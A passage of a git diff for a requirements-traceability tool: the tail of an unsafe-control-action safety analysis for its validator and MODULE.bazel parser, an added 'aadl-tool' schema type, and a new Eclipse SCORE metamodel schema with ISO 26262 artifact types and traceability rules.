conditional rules when the field they + depend on changes. + context: > + A conditional rule checks "if status == approved then + verification-criteria required." An artifact's status changes + from draft to approved, but the conditional rule query is not + invalidated. + hazards: [H-9, H-1] + rationale: > + The newly-approved artifact lacks verification-criteria but + the conditional rule does not fire because salsa returns the + cached result from when the artifact was still draft. + + providing: + - id: UCA-C-12 + description: > + Core applies conditional validation rules that contradict each + other on the same artifact. + context: > + Schema defines rule A requiring field X when status=approved, + and rule B forbidding field X when safety=ASIL_B. An artifact + has both status=approved and safety=ASIL_B. + hazards: [H-10] + rationale: > + Contradictory rules make compliance impossible. Engineers + disable or work around rules, undermining the validation system. + + - id: UCA-C-13 + description: > + Core incremental validation produces different diagnostics than + a clean full validation pass for the same inputs. + context: > + A sequence of incremental changes accumulates stale intermediate + results that a fresh full pass would not produce. + hazards: [H-9, H-3] + rationale: > + Divergence between incremental and full results means the tool + cannot be trusted. Safety-critical tooling must be deterministic. + + too-early-too-late: + - id: UCA-C-14 + description: > + Core evaluates conditional rules before schema loading completes, + using an incomplete rule set. + context: > + Salsa query ordering allows conditional rule evaluation to + proceed before all schema files have been parsed and merged. + hazards: [H-9, H-10] + rationale: > + Missing conditional rules means violations go undetected. + Rules added later in the schema merge are never applied. + + stopped-too-soon: [] + +# ============================================================================= +# Parser UCAs — MODULE.bazel Starlark subset parser +# ============================================================================= +parser-ucas: + control-action: Parse MODULE.bazel to discover cross-repo dependencies + controller: CTRL-CORE + + not-providing: + - id: UCA-C-15 + description: > + Parser does not extract git_override commit SHA, causing + cross-repo validation to run against the registry version + instead of the pinned override. + context: > + MODULE.bazel contains both bazel_dep(version="1.0") and + git_override(commit="abc123"). Parser extracts only bazel_dep. + hazards: [H-11, H-1] + rationale: > + Validation runs against the wrong version of the external repo, + producing coverage results that don't match the actual baseline. + + - id: UCA-C-16 + description: > + Parser does not emit a diagnostic when encountering unsupported + Starlark constructs, silently skipping them. + context: > + MODULE.bazel uses load() statements, string concatenation, or + variable references that the subset parser cannot handle. + hazards: [H-11] + rationale: > + Missing dependencies are not reported. Cross-repo validation + has blind spots where repos are not discovered. + + providing: + - id: UCA-C-17 + description: > + Parser extracts incorrect module name or version from a + bazel_dep() call due to malformed CST construction. + context: > + A parsing bug causes keyword argument values to be associated + with the wrong parameter names. + hazards: [H-11, H-1] + rationale: > + Cross-repo links resolve against a different module than + intended, producing silently incorrect traceability. + too-early-too-late: [] stopped-too-soon: [] diff --git a/schemas/aadl.yaml b/schemas/aadl.yaml index f559033..3a61c60 100644 --- a/schemas/aadl.yaml +++ b/schemas/aadl.yaml @@ -87,6 +87,65 @@ artifact-types: required: false cardinality: zero-or-many + - name: aadl-tool + description: > + An AADL ecosystem tool — captures what it does, what makes it + unique, and what capabilities spar could adopt from it. + fields: + - name: tool-url + type: string + required: false + description: Canonical URL for the tool or project + - name: origin + type: string + required: false + allowed-values: [academic, industry, open-source, government] + - name: maintainer + type: string + required: false + description: Organization or group maintaining the tool + - name: tool-status + type: string + required: true + allowed-values: [active, maintained, unmaintained, research-only, commercial] + - name: category + type: string + required: true + allowed-values: + - ide + - analysis + - verification + - code-generation + - scheduling + - safety + - optimization + - modeling + - simulation + - requirements + - name: capabilities + type: list + required: true + description: What the tool does (list of capability strings) + - name: differentiator + type: text + required: false + description: What makes this tool unique or special + - name: adoption-potential + type: text + required: false + description: What spar could adopt from this tool and at what priority + - name: spar-status + type: string + required: false + allowed-values: [not-applicable, not-started, partial, equivalent, superior] + description: How spar compares for this tool's core capability + link-fields: + - name: competes-with + link-type: traces-to + target-types: [aadl-tool] + required: false + cardinality: zero-or-many + - name: aadl-flow description: End-to-end flow with latency bounds fields: diff --git a/schemas/score.yaml b/schemas/score.yaml new file mode 100644 index 0000000..cd1d212 --- /dev/null +++ b/schemas/score.yaml @@ -0,0 +1,876 @@ +# Eclipse SCORE metamodel schema +# +# Maps the full Eclipse SCORE (Safety-Certified Open-source Real-time Ecosystem) +# metamodel into Rivet artifact types, link types, and traceability rules. +# +# SCORE targets ISO 26262 / ASIL-rated software and defines a V-model +# traceability chain from stakeholder requirements through architecture, +# implementation, and verification, with dedicated safety analysis types +# (FMEA, DFA) and process support artifacts. +# +# Metamodel areas: +# Process — tool support functions, workflows, guidance, tool requirements +# Requirements — stakeholder, feature, component, assumption-of-use +# Architecture — features (logical), components, modules, static/dynamic design +# Implementation — software units +# Safety — FMEA entries, dependent failure analysis +# Verification — test specifications, executions, verdicts +# Documents — general documents, architecture decision records +# +# References: +# https://eclipse-score.github.io/score/ + +schema: + name: score + version: "0.1.0" + namespace: "http://pulseengine.dev/ns/score#" + extends: [common] + description: > + Eclipse SCORE metamodel artifact types and traceability rules for + safety-certified automotive software (ISO 26262, ASIL A-D). + +# ────────────────────────────────────────────────────────────────────────── +# Artifact types +# ────────────────────────────────────────────────────────────────────────── +artifact-types: + + # ── Process types ────────────────────────────────────────────────────── + + - name: tsf + description: > + Tool support function — a capability provided by a development tool + that supports the SCORE workflow (e.g. build, lint, trace, test runner). + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: tool-name + type: string + required: false + description: Name of the tool providing this function + - name: tool-version + type: string + required: false + description: Version of the tool + - name: classification + type: string + required: false + allowed-values: [TI1, TI2, TI3] + description: Tool impact classification per ISO 26262-8 + link-fields: + - name: fulfils + link-type: fulfils + target-types: [tool-req] + cardinality: zero-or-many + + - name: workflow + description: > + A defined process workflow describing how artifacts are created, + reviewed, and released within the SCORE development process. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: process-area + type: string + required: false + description: Process area this workflow belongs to + link-fields: + - name: uses + link-type: uses + target-types: [tsf, guidance] + cardinality: zero-or-many + + - name: guidance + description: > + A guidance document providing instructions, templates, or conventions + for performing a development activity within SCORE. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: guidance-type + type: string + required: false + allowed-values: [template, convention, instruction, checklist] + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [workflow] + cardinality: zero-or-many + + - name: tool-req + description: > + A requirement on a development tool — specifies what a tool must do + to be qualified for use in the safety lifecycle. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + link-fields: + - name: satisfies + link-type: satisfies + target-types: [stkh-req, feat-req] + cardinality: zero-or-many + - name: complies + link-type: complies + cardinality: zero-or-many + description: Standards or regulations this tool requirement complies with + + # ── Requirements ─────────────────────────────────────────────────────── + + - name: stkh-req + description: > + Stakeholder requirement — a high-level need or expectation from a + stakeholder that the system must address. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: priority + type: string + required: false + allowed-values: [must, should, could, wont] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: source + type: string + required: false + description: Origin of the requirement (customer, regulation, standard) + - name: rationale + type: text + required: false + link-fields: [] + + - name: feat-req + description: > + Feature requirement — a requirement derived from stakeholder needs + that defines what a feature must provide. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: priority + type: string + required: false + allowed-values: [must, should, could, wont] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: req-type + type: string + required: false + allowed-values: [functional, performance, interface, constraint, safety] + - name: verification-criteria + type: text + required: false + link-fields: + - name: satisfies + link-type: satisfies + target-types: [stkh-req] + required: true + cardinality: one-or-many + + - name: comp-req + description: > + Component requirement — a technical requirement allocated to a + specific architectural component, derived from feature requirements. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: priority + type: string + required: false + allowed-values: [must, should, could, wont] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: req-type + type: string + required: false + allowed-values: [functional, performance, interface, constraint, safety] + - name: verification-criteria + type: text + required: false + link-fields: + - name: satisfies + link-type: satisfies + target-types: [feat-req] + required: true + cardinality: one-or-many + + - name: aou-req + description: > + Assumption of use requirement — a condition or constraint that must + hold for the system to operate safely. Documents the boundary + conditions and operating assumptions. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: assumption-type + type: string + required: false + allowed-values: [environmental, operational, interface, integration] + link-fields: + - name: complies + link-type: complies + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [feat, comp] + cardinality: zero-or-many + + # ── Architecture ─────────────────────────────────────────────────────── + + - name: feat + description: > + Feature — a logical architectural element representing a user-visible + capability. Acts as the top-level grouping in the logical architecture. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: interfaces + type: structured + required: false + description: Provided and required interfaces + link-fields: + - name: satisfies + link-type: satisfies + target-types: [feat-req] + cardinality: zero-or-many + + - name: comp + description: > + Component — a concrete architectural building block that realizes + one or more features. Maps to a deployable unit in the system. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: component-type + type: string + required: false + allowed-values: [library, service, driver, middleware, application, platform] + - name: interfaces + type: structured + required: false + description: Provided and required interfaces + link-fields: + - name: realizes + link-type: realizes + target-types: [feat] + required: true + cardinality: one-or-many + - name: uses + link-type: uses + target-types: [comp] + cardinality: zero-or-many + + - name: mod + description: > + Module — a fine-grained decomposition of a component into compilation + units or logical groupings of source files. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: source-path + type: string + required: false + description: Path to the source directory or file for this module + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [comp] + required: true + cardinality: one-or-many + - name: uses + link-type: uses + target-types: [mod] + cardinality: zero-or-many + + - name: dd-sta + description: > + Static detailed design — a view of the architecture showing the + structural relationships between components and modules (class + diagrams, package structure, data types). + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: view-type + type: string + required: false + allowed-values: [class-diagram, package-diagram, data-model, interface-spec] + link-fields: + - name: implements + link-type: implements + target-types: [comp-req] + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [comp, mod] + cardinality: zero-or-many + + - name: dd-dyn + description: > + Dynamic detailed design — a view of the architecture showing + runtime behavior (sequence diagrams, state machines, activity flows). + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: view-type + type: string + required: false + allowed-values: [sequence-diagram, state-machine, activity-diagram, timing-diagram] + link-fields: + - name: implements + link-type: implements + target-types: [comp-req] + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [comp, mod] + cardinality: zero-or-many + + # ── Implementation ───────────────────────────────────────────────────── + + - name: sw-unit + description: > + Software unit — a single source file or compilation unit that + implements part of the detailed design. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: source-file + type: string + required: false + description: Path to the source file + - name: language + type: string + required: false + allowed-values: [cpp, c, rust, python] + link-fields: + - name: implements + link-type: implements + target-types: [dd-sta, dd-dyn] + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [mod, comp] + cardinality: zero-or-many + + # ── Safety analysis ──────────────────────────────────────────────────── + + - name: fmea-entry + description: > + FMEA failure mode — an entry in a Failure Mode and Effects Analysis + identifying a potential failure mode, its effects, severity, and + mitigations. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: failure-mode + type: text + required: true + description: Description of the potential failure mode + - name: effect + type: text + required: false + description: Effect of the failure on the system or user + - name: cause + type: text + required: false + description: Root cause or mechanism of the failure + - name: severity + type: string + required: false + description: Severity rating (1-10 or category) + - name: occurrence + type: string + required: false + description: Occurrence/probability rating + - name: detection + type: string + required: false + description: Detection rating (ability to detect before harm) + - name: rpn + type: string + required: false + description: Risk Priority Number (severity x occurrence x detection) + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [comp, mod, feat] + cardinality: zero-or-many + - name: mitigated-by + link-type: mitigated-by + target-types: [comp-req, dd-sta, dd-dyn, sw-unit] + cardinality: zero-or-many + - name: violates + link-type: violates + target-types: [comp-req, feat-req] + cardinality: zero-or-many + + - name: dfa-entry + description: > + Dependent failure analysis entry — documents analysis of common-cause + and cascading failures between components (ISO 26262-9 clause 7). + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: failure-type + type: string + required: false + allowed-values: [common-cause, cascading, coupling] + description: Type of dependent failure + - name: analysis + type: text + required: true + description: Description of the dependent failure analysis + - name: coupling-factor + type: text + required: false + description: Root cause coupling factor between dependent elements + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [comp, feat] + cardinality: zero-or-many + - name: mitigated-by + link-type: mitigated-by + target-types: [comp-req, dd-sta, dd-dyn, sw-unit] + cardinality: zero-or-many + + # ── Verification ─────────────────────────────────────────────────────── + + - name: test-spec + description: > + Test specification — defines what to verify and the expected outcome. + May reference multiple requirement types and specify full or partial + verification coverage. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: safety-level + type: string + required: false + allowed-values: [QM, ASIL_A, ASIL_B, ASIL_C, ASIL_D] + - name: test-method + type: string + required: false + allowed-values: + - automated-test + - manual-test + - review + - static-analysis + - formal-verification + - simulation + - inspection + - name: preconditions + type: list + required: false + - name: steps + type: structured + required: false + - name: expected-result + type: text + required: false + link-fields: + - name: fully-verifies + link-type: fully-verifies + target-types: [stkh-req, feat-req, comp-req, aou-req] + cardinality: zero-or-many + - name: partially-verifies + link-type: partially-verifies + target-types: [stkh-req, feat-req, comp-req, aou-req] + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [comp, feat] + cardinality: zero-or-many + + - name: test-exec + description: > + Test execution — a record of running a test specification against + a specific version or configuration of the system. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: version + type: string + required: true + description: Version or release identifier under test + - name: commit + type: string + required: false + description: Git commit SHA + - name: timestamp + type: string + required: true + description: When the execution occurred (ISO 8601) + - name: executor + type: string + required: false + description: Who or what ran the test (CI system, person) + - name: environment + type: structured + required: false + description: OS, toolchain, hardware configuration + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [test-spec] + required: true + cardinality: one-or-many + + - name: test-verdict + description: > + Test verdict — the pass/fail outcome of a single test specification + within an execution run. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: verdict + type: string + required: true + allowed-values: [pass, fail, blocked, skipped, error] + - name: duration-ms + type: number + required: false + - name: evidence + type: string + required: false + description: Path to log file or test artifact + - name: defect + type: string + required: false + description: Issue tracker reference for failures + - name: failure-reason + type: text + required: false + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [test-exec] + required: true + cardinality: exactly-one + - name: fulfils + link-type: fulfils + target-types: [test-spec] + required: true + cardinality: exactly-one + + # ── Documents ────────────────────────────────────────────────────────── + + - name: doc + description: > + Document — a general-purpose document artifact (specification, + plan, report, manual) managed within the SCORE lifecycle. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: doc-type + type: string + required: false + allowed-values: + - specification + - plan + - report + - manual + - standard + - guideline + - name: version + type: string + required: false + - name: authors + type: list + required: false + link-fields: + - name: belongs-to + link-type: belongs-to + target-types: [workflow, feat, comp] + cardinality: zero-or-many + + - name: decision-record + description: > + Architecture decision record (ADR) — documents a significant + architectural or design decision, its context, alternatives + considered, and rationale. + fields: + - name: status + type: string + required: false + allowed-values: [draft, valid, invalid, in_progress, obsolete] + - name: rationale + type: text + required: true + description: Why this decision was made + - name: alternatives + type: text + required: false + description: Alternatives considered and why they were rejected + - name: consequences + type: text + required: false + description: Known consequences and trade-offs + link-fields: + - name: satisfies + link-type: satisfies + target-types: [feat-req, comp-req] + cardinality: zero-or-many + - name: belongs-to + link-type: belongs-to + target-types: [feat, comp] + cardinality: zero-or-many + +# ────────────────────────────────────────────────────────────────────────── +# SCORE-specific link types +# +# Link types already defined in common.yaml and reused here: +# satisfies / satisfied-by +# implements / implemented-by +# mitigates / mitigated-by +# verifies / verified-by +# +# The following are SCORE-specific additions. +# ────────────────────────────────────────────────────────────────────────── +link-types: + - name: complies + inverse: complied-by + description: Source complies with the target (standard, regulation, norm) + + - name: fulfils + inverse: fulfilled-by + description: Source fulfils the target (e.g. tool support function fulfils a tool requirement) + source-types: [tsf, test-verdict] + target-types: [tool-req, test-spec] + + - name: belongs-to + inverse: consists-of + description: Source belongs to / is part of the target (compositional containment) + + - name: uses + inverse: used-by + description: Source uses or depends on the target at runtime or build time + + - name: violates + inverse: violated-by + description: Source violates the target (failure mode contradicts a requirement) + source-types: [fmea-entry] + target-types: [comp-req, feat-req] + + - name: fully-verifies + inverse: fully-verified-by + description: Source fully verifies the target (complete verification coverage) + source-types: [test-spec] + target-types: [stkh-req, feat-req, comp-req, aou-req] + + - name: partially-verifies + inverse: partially-verified-by + description: Source partially verifies the target (incomplete verification coverage) + source-types: [test-spec] + target-types: [stkh-req, feat-req, comp-req, aou-req] + + - name: realizes + inverse: realized-by + description: Source realizes the target (component realizes a feature) + source-types: [comp] + target-types: [feat] + +# ────────────────────────────────────────────────────────────────────────── +# SCORE traceability rules +# +# These encode the SCORE V-model traceability chain. +# `rivet validate` checks these automatically. +# ────────────────────────────────────────────────────────────────────────── +traceability-rules: + + # ── Requirement chain (top-down) ─────────────────────────────────────── + + - name: stkh-req-has-feat-req + description: Every stakeholder requirement must be satisfied by at least one feature requirement + source-type: stkh-req + required-backlink: satisfies + from-types: [feat-req] + severity: warning + + - name: feat-req-derives-from-stkh + description: Every feature requirement must satisfy at least one stakeholder requirement + source-type: feat-req + required-link: satisfies + target-types: [stkh-req] + severity: error + + - name: feat-req-has-comp-req + description: Every feature requirement must be satisfied by at least one component requirement + source-type: feat-req + required-backlink: satisfies + from-types: [comp-req] + severity: warning + + - name: comp-req-derives-from-feat + description: Every component requirement must satisfy at least one feature requirement + source-type: comp-req + required-link: satisfies + target-types: [feat-req] + severity: error + + # ── Design implementation ────────────────────────────────────────────── + + - name: comp-req-has-design + description: Every component requirement must be implemented by a static or dynamic design + source-type: comp-req + required-backlink: implements + from-types: [dd-sta, dd-dyn] + severity: warning + + # ── Architecture realization ─────────────────────────────────────────── + + - name: feat-has-comp + description: Every feature must be realized by at least one component + source-type: feat + required-backlink: realizes + from-types: [comp] + severity: warning + + - name: comp-realizes-feat + description: Every component must realize at least one feature + source-type: comp + required-link: realizes + target-types: [feat] + severity: error + + # ── Verification coverage ────────────────────────────────────────────── + + - name: test-spec-verifies-req + description: > + Every test specification must fully or partially verify at least one + requirement (stakeholder, feature, component, or assumption of use) + source-type: test-spec + required-link: fully-verifies + target-types: [stkh-req, feat-req, comp-req, aou-req] + severity: warning + + - name: feat-req-has-verification + description: Every feature requirement should be verified by at least one test specification + source-type: feat-req + required-backlink: fully-verifies + from-types: [test-spec] + severity: warning + + - name: comp-req-has-verification + description: Every component requirement should be verified by at least one test specification + source-type: comp-req + required-backlink: fully-verifies + from-types: [test-spec] + severity: warning + + # ── Module containment ───────────────────────────────────────────────── + + - name: mod-belongs-to-comp + description: Every module must belong to at least one component + source-type: mod + required-link: belongs-to + target-types: [comp] + severity: error + + # ── Safety analysis ──────────────────────────────────────────────────── + + - name: fmea-has-mitigation + description: Every FMEA entry should have at least one mitigation + source-type: fmea-entry + required-link: mitigated-by + target-types: [comp-req, dd-sta, dd-dyn, sw-unit] + severity: warning + + # ── Test verdict chain ───────────────────────────────────────────────── + + - name: verdict-has-exec + description: Every test verdict must belong to a test execution + source-type: test-verdict + required-link: belongs-to + target-types: [test-exec] + severity: error + + - name: verdict-fulfils-spec + description: Every test verdict must fulfil a test specification + source-type: test-verdict + required-link: fulfils + target-types: [test-spec] + severity: error